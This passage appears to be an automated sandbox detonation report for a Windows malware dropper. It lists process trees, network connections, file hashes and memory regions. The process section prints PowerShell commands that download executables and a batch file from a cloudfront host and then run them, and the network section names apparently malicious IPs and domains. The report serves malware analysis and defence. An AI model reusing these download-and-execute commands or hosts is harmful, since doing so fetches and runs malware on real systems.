PID 2628 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
PID 2200 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
PID 2200 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
PID 2628 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2200 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
PID 2200 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
PID 2200 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3652 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4836 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2200 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
PID 2200 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
PID 2200 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
PID 2912 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2912 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=28381000 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5024 -ip 5024

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe

"C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2200 -ip 2200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 532

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 108.156.61.188:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 188.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 192.15.239.18.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 80.41.65.18.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 210.61.156.108.in-addr.arpa udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 note.padd.cn.com udp
DE 185.172.128.76:80 185.172.128.76 tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
RO 176.97.76.106:80 note.padd.cn.com tcp
US 8.8.8.8:53 76.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 monoblocked.com udp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 c.574859385.xyz udp
GB 37.221.125.202:443 c.574859385.xyz tcp
US 8.8.8.8:53 202.125.221.37.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 14.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
FR 143.244.56.49:443 download.iolo.net tcp
US 8.8.8.8:53 49.56.244.143.in-addr.arpa udp
RU 91.215.85.66:15647 tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat

MD5 c03b3682569c40524152ba0ea7bc25ff
SHA1 670c137c03ade8b573e4084c12dcb1d00e377c20
SHA256 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f
SHA512 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a

memory/1732-16-0x0000000002DD0000-0x0000000002E06000-memory.dmp

memory/1732-17-0x0000000073B10000-0x00000000742C0000-memory.dmp

memory/1732-19-0x0000000002EF0000-0x0000000002F00000-memory.dmp

memory/1732-18-0x0000000002EF0000-0x0000000002F00000-memory.dmp

memory/1732-20-0x00000000058E0000-0x0000000005F08000-memory.dmp

memory/1732-21-0x0000000005F50000-0x0000000005F72000-memory.dmp

memory/1732-22-0x0000000006020000-0x0000000006086000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_azlpfouc.lgs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1732-28-0x0000000006090000-0x00000000060F6000-memory.dmp

memory/1732-33-0x0000000006200000-0x0000000006554000-memory.dmp

memory/1732-34-0x00000000066D0000-0x00000000066EE000-memory.dmp

memory/1732-35-0x0000000006720000-0x000000000676C000-memory.dmp

memory/1732-36-0x0000000007F10000-0x000000000858A000-memory.dmp

memory/1732-37-0x0000000006BC0000-0x0000000006BDA000-memory.dmp

memory/1732-40-0x0000000073B10000-0x00000000742C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/4384-43-0x0000000005340000-0x0000000005350000-memory.dmp

memory/4384-42-0x0000000073B10000-0x00000000742C0000-memory.dmp

memory/4384-53-0x0000000006300000-0x0000000006654000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c83cc8b95f9ca9b75499438b45880c2
SHA1 8973f5474624292ebccc9c7149d768b739d4df73
SHA256 e830a032f2cc93e30c235afc1ff7fa095fbccca8305a24ccc909c07d9d5e7af4
SHA512 9bb1c97b3b77f6daefa3bf329817673eaded16efe74590cf84a97c4936fc145ee7b7e167722abace83554293b36b6886ecce84f339cd0d211bf976de0a27b7c3

memory/4384-57-0x0000000073B10000-0x00000000742C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 ae73eb4cbe39e4a9e28a367331329a12
SHA1 fa827d6b4f9c94dd137fc24b201259a4c8293913
SHA256 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e
SHA512 b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500

memory/1120-62-0x0000000073B10000-0x00000000742C0000-memory.dmp

memory/2200-64-0x00000000041A0000-0x000000000420D000-memory.dmp

memory/2200-63-0x0000000004260000-0x0000000004360000-memory.dmp

memory/1120-65-0x0000000002A30000-0x0000000002A40000-memory.dmp

memory/1120-66-0x0000000002A30000-0x0000000002A40000-memory.dmp

memory/1120-76-0x0000000005EB0000-0x0000000006204000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a89739c1fa3a1cbdab8821893a1d2ca8
SHA1 fe9c5acb5ddceb4027cdce38e1b138f7daa02ef6
SHA256 c1ef6ddd816078ef2e8cd45a5010fdd62bfbae31c7bb9e4469462033f26605ca
SHA512 e6a837382e0e92cb4276298d6e36360c5c7f14d167c1dfebbabeeabc1f4755e54381f0e0a5406b955162ff7c034cc7b23984d350f67d2c687a13b69328ff15d3

memory/1120-78-0x00000000069C0000-0x0000000006A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe

MD5 80e0fece33768e20034d106db0d36341
SHA1 ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510
SHA256 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e
SHA512 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f

memory/5024-88-0x0000000004210000-0x0000000004310000-memory.dmp

memory/5024-89-0x0000000004080000-0x00000000040A7000-memory.dmp

memory/1120-91-0x0000000073B10000-0x00000000742C0000-memory.dmp

memory/5024-92-0x0000000000400000-0x000000000403C000-memory.dmp

memory/816-93-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/816-94-0x0000000004D00000-0x0000000004D10000-memory.dmp

memory/816-95-0x0000000004D00000-0x0000000004D10000-memory.dmp

memory/816-105-0x0000000005C80000-0x0000000005FD4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e659d112ad5453b1378a4b666ef3681
SHA1 825343aca4d67fbb9b195a852f6dc4b6bf001907
SHA256 2df426352af89a4120a633cbb5bfc9d1d79f6e0a2afcc7d1fd6d1a85491c271b
SHA512 2a47aca5be8a5006e7f80ffef2a8def2182aa0b30ddda1f4b81164a436d194343b0e1dcd779a01162c0553e9479724965c4dcab0cc6275b0e0435d70d8662ed2

memory/816-107-0x00000000066B0000-0x00000000066FC000-memory.dmp

memory/2200-108-0x0000000000400000-0x000000000405F000-memory.dmp

memory/2200-110-0x0000000004260000-0x0000000004360000-memory.dmp

memory/816-113-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/816-114-0x0000000004D00000-0x0000000004D10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1p4.1.zip

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\u1p4.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\u1p4.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u1p4.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/3652-202-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/3652-203-0x00007FFF9CED0000-0x00007FFF9D0C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1p4.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/3652-209-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/2200-210-0x0000000000400000-0x000000000405F000-memory.dmp

memory/3652-211-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\261c2d90

MD5 d16113abda25d68f63c28da6f0f66796
SHA1 878ad80612b5a4cd992e6d1e28b13163eb7fcd50
SHA256 9cc195a235418dfdb5608f0f311ec8aa957b3c1c08c1e8ac981951bffd587bf1
SHA512 9b65dbffb0b03a8b0ccd982c6d9ed14f4b17b9309e247e61717d6b36b125943e6b9e773b17b7614ad9730738c618aa5d1ea9a04b6986d632c90056541558481a

memory/4836-213-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/4836-215-0x00007FFF9CED0000-0x00007FFF9D0C5000-memory.dmp

memory/4836-218-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/4836-219-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/4836-221-0x000000006ECE0000-0x000000006EE5B000-memory.dmp

memory/4984-222-0x000000006D880000-0x000000006EAD4000-memory.dmp

memory/4984-226-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/4984-227-0x0000000000700000-0x00000000007C6000-memory.dmp

memory/4984-228-0x0000000004C30000-0x0000000004CC2000-memory.dmp

memory/4984-229-0x0000000005280000-0x0000000005824000-memory.dmp

memory/4984-230-0x0000000004D30000-0x0000000004D40000-memory.dmp

memory/4984-231-0x0000000004F10000-0x00000000050D2000-memory.dmp

memory/4984-232-0x0000000004DC0000-0x0000000004E36000-memory.dmp

memory/4984-233-0x0000000004D50000-0x0000000004DA0000-memory.dmp

memory/4984-236-0x0000000073280000-0x0000000073A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/4984-248-0x0000000004D30000-0x0000000004D40000-memory.dmp

memory/2912-249-0x0000000000A90000-0x0000000000A91000-memory.dmp

memory/2200-254-0x0000000000400000-0x000000000405F000-memory.dmp

memory/2912-274-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2912-286-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2012-287-0x00007FFF7C570000-0x00007FFF7D031000-memory.dmp

memory/2012-288-0x000001E2AFF20000-0x000001E2B3818000-memory.dmp

memory/2012-289-0x000001E2CDCF0000-0x000001E2CDD00000-memory.dmp

memory/2012-290-0x000001E2CE000000-0x000001E2CE110000-memory.dmp

memory/2012-291-0x000001E2B5540000-0x000001E2B5550000-memory.dmp

memory/2012-292-0x000001E2CDCA0000-0x000001E2CDCAC000-memory.dmp

memory/2012-293-0x000001E2B5550000-0x000001E2B5564000-memory.dmp

memory/2012-294-0x000001E2CE120000-0x000001E2CE144000-memory.dmp

memory/2012-295-0x000001E2B3C20000-0x000001E2B3C2A000-memory.dmp

memory/2012-297-0x000001E2CE2D0000-0x000001E2CE382000-memory.dmp

memory/2012-298-0x000001E2CE380000-0x000001E2CE3FA000-memory.dmp

memory/2012-296-0x000001E2CE290000-0x000001E2CE2BA000-memory.dmp

memory/2012-299-0x000001E2CE400000-0x000001E2CE462000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win7-20240221-en

Max time kernel

117s

Max time network

118s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 3904 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2348 wrote to memory of 3904 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2348 wrote to memory of 3904 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3904 -ip 3904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 147.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

N/A